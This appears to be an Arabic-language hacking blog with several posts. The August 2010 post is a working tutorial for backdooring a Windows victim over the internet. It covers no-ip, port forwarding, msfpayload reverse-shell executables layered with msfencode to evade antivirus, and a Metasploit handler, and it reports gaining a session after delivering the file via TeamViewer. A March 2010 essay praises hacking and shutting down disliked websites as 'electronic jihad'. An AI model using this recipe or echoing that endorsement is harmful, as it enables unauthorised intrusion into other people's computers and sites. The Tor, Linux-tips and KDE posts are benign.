penetration testing
jeudi 5 mai 2011
BackTrack 5 Release – May 10th, 2011
http://www.backtrack-linux.org/
mercredi 25 août 2010
حصري الإختراق بالحصري الإختراق بال no-ip وعمل port forwarding على backtarck4 وإختراق ويندوز خ
مرحبا بمناسبة رمضان والغياب الطويل وكسر روتين موضوع يفتح النفس للذين فقدوا الامل في المتسبلويت شرح فتح البورت في روتر sagem fast 1201 وميزة جديدة قد لا يعرفها الكثيرين أنها أصبحت تدعم no-ip في إكسبلوات تكتب عنوانك والتجربة ستكون على bt4 attacker متصل بشبكة wifi لصديق لي وويندوز فيستا victime متصل بشبكة داخلية في المنزل وكل جهاز متصل بروتر خاص به .
نقوم في البداية بتحميل no-ip عن طريق synaptic
وأثناء تنصيب ستفتح لنا نافذة كما في الصورة التالية في تجربتي تركت المربع خالي حيث خيار عدم تفعيل nat يبدو أن هذه الخطوة مهمة لا أعرف ولكن عند نجاح الاختراق قمت بتبديل الأدوار ففي التجربة الاولى كان جهاز bt4 متصل من شبكة wifi عندما حاولت العكس أي ويندوز على wifi
في المحاولة الاولى إذا لم تنجح قم بكتابة صح على المربع الصغير الضاهر في الصورة ستسأل كيف قم بحذف البرنامج وإعادة تثبيته
بعد تنصيب no -ip جاء الدور على فتح البورت في المودم في خيار nat نضغط على port fowrarding وبعد ذلك add نكتب البورت المراد استخدامه في حالتي 4444 وبعد ذلكsave
وهذه بعض خيارات msfpayload مع وبدون تشفيرة./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e
x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E
كما نرى في الصورة في team viewer نجاح تحميل الباكدور للجهاز
نقوم بتشغيله ونحصل على session meterpreter كما في الصورة ip خارجي
play slid show to see picture
dimanche 16 mai 2010
شرح تنصيب برنامج tor المشهور على ابونتو !! للباحثين عن الخصوصيه المطلقه !
ا
شرح طريقة تنصيب برنامج Tor وهو عباره عن برنامج يقدم خوصيه مطلقع على شبكة المعلومات
ويعمل كProxy دائم لجهاازك ولإتصالك بالانترنت!
لن اطيل عليكم وسأدخل في الشرح مباشره
(( الشرح فقط لمستخدمي ابونتو ولمستخدمي توزيعات الديبيان ))
الخطوه الأولى :
لمستخدمي توزيعات ديبيان اذهب غلى terminal واكتب الآمر التالي لتضيف الباكيج
sudo gedit /etc/apt/sources.list
ثم اضف هذا السطر في قائمة المصادر
deb http://deb.torproject.org/torproject.org main
(( مستخدمي ابونتو لا داعي لعمل الخطوات اعلاه ))
بعد ذلك اضف هذه الاسطر وهي مفتاح الدخول لهذه الباكيج
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
الآان احفظ الملف واخرج منه !
الآان اذهب إلى terminal واكتب
apt-get update
apt-get install tor tor-geoipdb
(( مستخدمي ابونتو فقط يجب كتابه السطر الثاني بدون السطر الاول ))
الآاان tor تنصب على الجهاز لكن لايزال بدون تفعيل
الخطوه الثانيه : ((تنزيل برنامج polipo لتصفح الانترنت و تجهيزه للعمل مع tor ))
أولا اذهب إلى terminal واكتب الأمر التالي :
sudo apt-get install polipo
cd /etc/polipo
sudo gedit config
((داخل ملف config من جملة Basic configuration ### إلى اسفل استبدلها باللاعدادات داخل الرابط ))
بعد ذلك احفظ الملف واغلقه ونفذ الآمر التالي :
sudo /etc/init.d/polipo restart
الخطوه الثالثه والآخيره : اعداد البرامج للتعامل مع tor
وهذه الخطوه بسيطه جدا
تتمثل بالدخول لهذا الرابط وتحميل ملف الplugin للفايرفوكس
وتأكد من تشغيل tor على الفايرفوكس
الآاان بعد ما جعلت المتصفح يعامل tor لم يبقى إلا ان تجعل البرامج الآخرى تعامله ايضاً
وذلك بالدخول إلى HTTP proxies الخاص بها وتغييرها إلى ( localhost , port:8118)
الآاان tor جاهز بحمدالله تعالى على الفايرفوكس وبرامجك ايضا
استمتع بالخصوصيه المطلقه !!
ملاحظه : من الممكن ان تلاحظ ان سرعه التصفح قد هبطت ! هذا لأن سيرفرات tor تستقبل الااف الip's في نفس الوقت !
dimanche 9 mai 2010
samedi 13 mars 2010
الأخطاء العشرة الواجب تجنبها للمبتدئ اللينوكس
إذا كنت مبتدئا في استخدام لينوكس فبالتأكيد هذا المقال هام لك …
أنا هنا أتحدث عن المستخدمين العاديين للينوكس، وليس المهووسين (Geeks). والمستخدم العادي الذي اقصده هنا هو الذي لا يهمه ولا يريد ان يعرف كيف يعمل الكمبيوتر ولكنه يستخدمه في حياته اليومية وفقط.
وبمرور الوقت تزيد شهرة بعض توزيعات لينوكس . خاصة أبونتو. وهذا ما يثير اهتمام بعد المستخدمين المحترفين لمايكروسوفت ويندوز بتجربه لينوكس , ولكن هؤلاء المنتقلين حديثا للينوكس يكررون بعض الاخطاء الشائعة وهذا ما سنتكلم عنه هنا.
تجاهل التوثيق والمساعدة الرسمية اللتي تأتي مع التوزيعة
على سبيل المثال ، النسخة المنصبة حديثا من أبونتو تجد في الشريط العلوي ايقونة علامة استفهام زرقاء بجانب ايقونة فايرفوكس. فمركز المساعدة بأبونتو ليس عديم القيمة لقد أنشأ لمساعدتك , ولنسأل انفسنا بجدية كم عدد من استخدموا المساعدة والتوثيق الرسمي.
عدم الدخول على المنتديات أو قنوات الـ irc للمساعدة خطوة بخطوة أو لإيجاد حلول سريعة
بالطبع لا تفعل هذا إلا إذا بحثت في جوجل أولا أو اي محرك بحث أخر. جوجل هو صديقك وخاصة البحث الخاص بلينوكس Google – Linux Seach. لا تتجاهل الويكي أيضا فهي مساهمات من أعضاء المجتمع لمساعدتك على التعامل بسهولة مع ما تريد معرفته
تجاهل رسائل الخطأ اللتي يعطيها لك النظام
في جنو/لينوكس ليس كل خطأ معناه حدوث تعليق أو مشكلة كبيرة بالنظام، لذلك عند قرائتك بعناية لرسائل الخطأ ستجد أنها تخبرك ما هي المشكلة وكيف يمكنك حلها.
على سبيل المثال: اذا استخدمت apt-get للبحث عن حزم وتبين أن هذه بعض إعتماديات الحزم مكسورة broken dependences ستجد أنها يقول لك يوجد عدد …. من الحزم المكسورة ولكنه يخبرك استخدم apt-get install -f لإصلاح المشكلة.
استخدام المستخدم الجذر
لا يمكنك ان تتعامل بسهولة مع لينوكس حتى تعرف كيف تستخدم صلاحيات الجذر root. تعامل مع النظام ولا تقلق من أن تخرب شيئا. إنها احسن الطرق للتعلم. إذا كنت قلقا من أن يؤدي استخدامك لتعطيل شئ ضع لينوكس على جهاز إفتراضي Virtual Machine وأبق دائما نسخة إحتياطية في حالة حدوث أي مشكلة.
التفائل الزائد عن الحد
لا تتفائل أكثر من اللازم ، جنو/لينوكس لن يعمل أسرع ب 3000% أسرع من مايكروسوفت ويندوز. ولكنه يظل أفضل كثيرا. فهو مستقر وهذا لا يعني أنه نظام خال من العيوب.
الإعتماد على wine كثيرا
استخدام wine طريقة جيدة لتشغيل برامج ويندوز على لينوكس. ولكن هذا لا يعني أنه يمكنك تشغيل كل البرامج على wine. فهو ليس الحل الأمثل. لذلك فمن الأفضل أن تجد بديلا يعمل بشكل إفتراضي. لذلك عندما لا يعمل برنامجك على wine لا تصرخ وتتكلم كثيرا ولكن جد طريقة إلتفافية لتشغيله أو أوجد البديل.
البحث عن أفضل توزيعة
لن تجد أفضل توزيعة أبدا . Distrowatch ليس خدمة للزواج :). أختر فقط التوزيعة اللتي تجد أنها الأقرب لما تريده. وأبدأ في تخصيصها . فلن تجد أبدا توزيعة تقدم كل شئ كما أنه لا يجد ما يمنعك من اللعب بتوزيعتك وتخصيصها كما تشاء. فقط خصص توزيعتك المفضلة وشاركها مع الاخرين.
البدأ بسطر الأوامر
قد يعترض الكثيرون على هذا، ولكني أعتقد أن هذا ليس ضروريا. لكي تستخدم جنو/لينوكس لا يجب أن تكون محترفا لسطر الأوامر. يجب عليك انت تعرف فكرة مبسطة عن سطر الأوامر وطريقة كتابة الأوامر. تعلم الأساسيات فقط إذا كنت تستخدم لينوكس كجهاز شخصي. يوجد العديد والعديد من المراجع عن سطر الأوامر والأومر الخاصة بـ bash اللتي يمكن أن ترجع لها عند الضرورة. إذا كنت تتعلم لينوكس لكي تدير سيرفرات فلا غنى لك عن سطر الأومر.
تعليق الأخطاء على شماعة اللينوكس
إذا كنت خبيرا بتكنولوجيا المعلومات ولديك مشاكل مع لينوكس. فلا تعتقد انك خبير. فلا يهم إذا كنت خبيرا في تكنولجيا المعلومات على أنظمة مايكروسوفت. ولكن يوجد الكثير والكثير ممن هم ضد اللنوكس على الإنترنت. فلقد رأيت العديد “الخبراء” يلقون باللوم على لينوكس عن أخطاء هم من ارتكبها. بالمناسبة اللينوكس لا يأتي بضمان لذلك فلن تجدي لعبة اللوم هذه فهذا ليس عدلا.
هذه تسع أخطاء , وإليك العاشر
ترك استخدام اللينوكس
إذا كنت محترفا في أنظمة الماك أو الويندوز فهل هذا يعني أنك ولدت خبيرا؟؟ بالطبع لأ … لا يمكن أتقان شئ من مجرد استخدامه يوما واحدا أو استخدامه بمهام بسيطة من مهامنا اليومية. فتعلم المشى يحتاج إلى تمرين وكذلك لينوكس. تعلم لينوكس ليس التحدي المهم وليس مهم حرجة ، لذلك أعطه بعض الوقت. أنه نظام تشغيل وليس برنامج.
يوجد مفهوم خاطئ لدى البعض أن استخدام لينوكس صعب ولا يمكن تعلمه بسهولة ، فقط فكر في أنه سهل وسيكون سهلا بالنسبة لك ….
المصدر
ترجم بتصرف من Penguin Inside
jeudi 11 mars 2010
حياة الهكر في العالم العرب
أخوكم : فيصل الأنصاري – Mr.pho0T0oshoP
العنوان : حياة الهكر في العالم العربي
مفهوم الهكر في العالم الهكر : شخص غامض , يخترق كيف ما يشاء والناس تخاف منه , ويعتبر شخصية كبيرة ويكون له أعوان يلحقون خلف شهرته وقد يتلبسون بها , في عصرنا الحالي انقلبت الموازين , أصبح الصغار كبارا بعقولهم في عالم الهكر أعمارهم تتراوح ما بين الـ 16 سنة و الـ 20 سنة .. في هذا السن تجد كثيرون محترفون في عالم الهكرز , منهم الطيب ومنهم الخبيث , المخترقون أجناس.. وقد تجد فيهم من يساعد الناس في استرجاع بياناتهم و بريدهم الالكتروني .. ومنهم من يقوم بسرقة الناس مدعيا انه شخص طيب وهو في الأصل متلصص يريد أن يخترق عبثا , كثرت عمليات الاختراقات في العالم العربي .. ولاحظنا الاختراقات الكثيرة على المواقع العربية وبأيدي عربية للأسف .. أصبح الهكر وسيلة للتهديد ووسيلة للانتقام وأصبح وسيلة للاستفادة من الأشخاص إما من اجل المال أو شيء يريده ولم يجده إلا عند شخص ما ,هذه الثلاثة من اغلب ما يحدث بين ما يسمون بالهكر .
كتب احد الهاكرز عن الفرق بين ( الهكر والكراركرز):
يوجد فرق كبير بين الهاكر و الكراكر , الهاكرز هم الذين بنوا الانترنت,الهاكرز الذين يتحكمون بإنشاء المواقع ,بعمل الكمبيوترات ,بكل شيء تراه على الانترنت أما الكر اكر هم الأوغاد من الذين لا هم لهم سوى إفساد و تخريب المواقع و سرقة البرامج و البحث عن الكراك لبرنامج اصلي و البحث عن أرقام الفيزا و أرقام الحسابات في البنوك والايميلات الشخصية بالافراد . الهكرز هم أشخاص أصلا مبرمجين محترفين طوروا قدراتهم وأصبحوا يستطيعون التسلل إلى الأجهزة والمواقع وغيرها وأسمهم بالعربي مخترقون أو متسللون أما الانجليزي وهو الشائع الكتابة بنطقه بالعربي هو (HACKERS)
( انتهى كلامه) .
تتعدد أقسام الهكر في العالم العربي إلى ثلاث أقسام هي :
1- المبتدئ: وهو أخطر أنواع المخترقين لأنه يريد تجربة كل ما تعلمه وغالبا ما التدمير للأجهزة.
2- الخبير: وهذا لا خوف منه لأنه يخترق الأجهزة فقط للبحث فيها و أخذ ما يعجبه منها
3- المحترف: وهو يجمع الاثنين معا فأولا يأخذ الأشياء التي يريدها من جهاز الضحية يترك الضحية .. والبعض يدمر.
فهنا .. قمنا بالتوضيح لسبب واحد هو : أن الهكر علم فلا تستخدمه في السوء
طرح بعض الأسئلة على الأخ جهاد الملقب بـ (Dr.JiHaD) أخي جهاد :ما وجهة نظرك للهكر في العالم العربي .. من الناحية الإيجابية ؟؟
Dr.JiHaD:
أرى أن هذا العلم وهذه:التقنية قد تستعمل لكثير من النواحي الايجابية في الهكر خاصة لدى الهكر العربي المسلم , فكثير من الهكر العرب يخترقون المواقع المعادية للإسلام
وسوف اذكر مثالا على هذا :
المواقع الإباحية العربية انتشرت فالهكرز العرب يخترقون هذه المواقع ويغلقونها وهذا ما امرنا به نبينا محمد صلى الله عليه وسلم في حديثه النهي عن المنكر من الإيمان عن أبي سعيد الخدري رضي الله تعالى عنه قال سمعت رسول الله صلى الله عليه وسلم يقول : ( من رأى منكم منكرا فليغيره بيده فإن لم يستطع فبلسانه فإن لم يستطع فبقلبه وذلك أضعف الإيمان ) رواه مسلم . فهذا ما يسمى بالتغير باليد فنستنتج من النواحي الايجابية في عالم الهكر العربي انه يمكن تغير المنكر ومحاربه العدو والجهاد الالكتروني .
وما وجهة نظرك للهكر في العالم العربي .. من الناحية السلبية ؟؟
لأسباب وهي :
أحدى المنتديات التي امتازت بتعليمها الحماية :
[ بيت الهكر - العاصفة – سعودي هاك – قراصنة السعودية - ترياق - غضب فلسطين ] وهناك منتديات أخرى .
غضب فلسطين : احترافيتها في مجال البرمجة بشكل عام .. وهو منتدى متميز باكتشاف الثغرات الجديدة وترقيعها .
كلمة قبل الختام : إن انتقادي لمحاربة الهكر هو لسبب واحد وهو .. ( لولى الهكر لما خلقت الحماية ) مفهوم العبارة : أي إن لم يكن هناك هكر لما صنعت الحماية
لأن من صنعها هو مخترقها .. وأغلب برامج الحماية تصنع فيروسات .. وفي نفس الوقت تأتي بمضاد لها
والسبب: حتى يمشي سوقها لبرنامجها الجديد
كلمة الختام: لكل هكر مسلم أن يستفيد مما أعطاه الله من علم في الخير ومساعدة الناس وعدم إيذاء المسلمين
لأن إيذاء المسلمين ليس من صفات الحبيب المصطفى محمد رسول الله – صلى الله عليه وسلم – فبالعلم نستفيد
lundi 8 mars 2010
شرح تنصيب KDE 4 الجديدة والتطبيق على backtrack 4
أهلا وسهلا أحب تنويع المواضيع وأن لا تقتصر على الإختراق فقط لقد ثبت واجهة kubuntu 9.10 التي تستعمل kde4 وأحببت أن اشرككم لنبدأ سيكون الشرح سريع ولكن الخطوات سهلة
نذهب إلى موقع
clik here
وصفحة شرح تنصيب kde وهو سهل نسخ ولصق
ننسخ كل سطر واحد و نضغط على entersudo aptitude install build-essential kde-devel xorg-dev cdbs debhelper cmake \
kdesdk-scripts subversion ssh xserver-xephyr doxygen dbus-x11 \
libxml2-dev libxslt1-dev shared-mime-info libical-dev libgif-dev libssl-dev \
libboost-dev libboost-program-options-dev libboost-graph-dev libgpgme11-dev libxine-dev \
libqimageblitz-dev libbz2-dev libdbus-1-dev libpam0g-dev libpcre3-dev \
libkrb5-dev libsm-dev libclucene0ldbl libclucene-dev libjpeg62-dev \
libxtst-dev xsltproc libxrender-dev libfontconfig1-dev automoc librdf0-devsudo aptitude install build-essential kde-devel xorg-dev cdbs debhelper cmake \
kdesdk-scripts subversion ssh xserver-xephyr doxygen graphviz libqt4-dev \
dbus-x11 libdbus-1-dev libstreamanalyzer-dev libstrigiqtdbusclient-dev \
libxml2-dev libxslt1-dev shared-mime-info libgif-dev libpcre3-dev \
libclucene0ldbl libclucene-dev libjpeg62-dev libkrb5-dev libsm-dev \
libssl-dev libbz2-dev libical-dev libxml2-utils libopenexr-dev \
libjasper-dev libenchant-dev libavahi-common-dev libaspell-dev \
libasound2-dev libboost-dev libboost-program-options-dev libboost-graph-dev libgpgme11-dev \
libldap2-dev libsasl2-dev libxine-dev libqimageblitz-dev libsmbclient-dev \
libxkbfile-dev libxcb1-dev libxklavier-dev libxdamage-dev \
libxcomposite-dev libbluetooth-dev libusb-dev \
libcaptury-dev network-manager-dev libsmbclient-dev libsensors-dev \
libpam0g-dev libnm-util-dev libusb-dev libcfitsio3-dev libnova-dev \
libeigen2-dev libopenbabel-dev libfacile-ocaml-dev libboost-python-dev \
libsvn-dev libsvncpp-dev libqt4-dev libqca2-dev \
libstreamanalyzer-dev libstrigiqtdbusclient-dev \
libcommoncpp2-dev libidn11 libidn11-dev libxtst-dev librdf0-dev xsltproc \
libxrender-dev libfontconfig1-dev libpci-dev libxss-dev libxft-dev \
libpolkit-dbus-dev libpolkit-grant-dev libpolkit-dev git \
libpoppler-qt4-dev libspectre-dev
باقي الصفحات يشرح تثبيت الحزم ويمكن تختار الذي تريد وهذا للمحترفين
بعض الصور من جهازي
نسيت حاجة أنا لم احذف النسخة السابقة من kde وعند تشغيل الجهاز يطلب منك أي سطح مكتب تريد